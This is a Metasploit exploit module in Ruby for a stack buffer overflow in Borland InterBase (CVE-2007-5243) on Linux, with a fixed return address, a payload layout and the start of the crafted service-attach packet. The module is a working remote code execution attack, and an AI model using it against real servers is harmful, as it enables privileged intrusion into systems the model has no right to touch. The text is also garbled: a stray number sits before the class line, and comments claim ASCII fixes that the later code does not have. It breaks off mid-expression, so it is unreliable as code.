##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
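# Core framework classes referenced below (Msf::Exploit::Remote, the
# Remote::Tcp mixin and the Opt helpers). The extracted listing carried a
# typographic quote here, which is not valid Ruby string syntax.
require 'msf/core'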
16 class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
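##
# Registers this module's metadata with the framework and declares its
# options.
#
# The metadata is unchanged from the original listing; the only code change
# is that the typographic quotes and Unicode minus signs introduced by the
# document extraction have been replaced with ASCII so the file parses.
#
# @param info [Hash] metadata supplied by the framework; merged with the
#   values below via update_info before being handed to super
def initialize(info = {})
  super(update_info(info,
    'Name'           => 'Borland InterBase INET_connect() Buffer Overflow',
    'Description'    => %q{
        This module exploits a stack overflow in Borland InterBase
        by sending a specially crafted service attach request.
    },
    'Version'        => '$Revision$',
    'Author'         =>
      [
        'ramon',
        'Adriano Lima <adriano@risesecurity.org>',
      ],
    'Arch'           => ARCH_X86,
    'Platform'       => 'linux',
    'References'     =>
      [
        [ 'CVE', '2007-5243' ],
        [ 'OSVDB', '38605' ],
        [ 'BID', '25917' ],
        [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
      ],
    # The module reports that a successful session runs with the
    # privileges of the InterBase service process.
    'Privileged'     => true,
    'License'        => MSF_LICENSE,
    'Payload'        =>
      {
        'Space'    => 512,
        'BadChars' => "\x00\x2f\x3a\x40\x5c",
      },
    'Targets'        =>
      [
        # 0x0804d2ee 5b5e5f5dc3
        [
          # A single target; the fixed 'Ret' value is tied to the builds
          # named in this string and is not expected to match others.
          'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
          { 'Ret' => 0x0804d2ee }
        ],
      ],
    'DefaultTarget'  => 0
  ))

  # Only the remote port is configurable; 3050 is InterBase's default
  # listener port.
  register_options(
    [
      Opt::RPORT(3050)
    ],
    self.class
  )
end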
def exploit
connect
# Attach database
op_attach = 19
# Create database
op_create = 20
# Service attach
op_service_attach = 82
length = 161
remainder = length.remainder(4)
padding = 0
if remainder > 0
padding = (4 − remainder)
end
buf = ’’
# Operation/packet type
buf << [op_service_attach].pack(’N’)
# Id
buf << [0].pack(’N’)
# Length
buf << [length].pack(’N’)
# Random alpha data
buf << rand_text_alpha(length −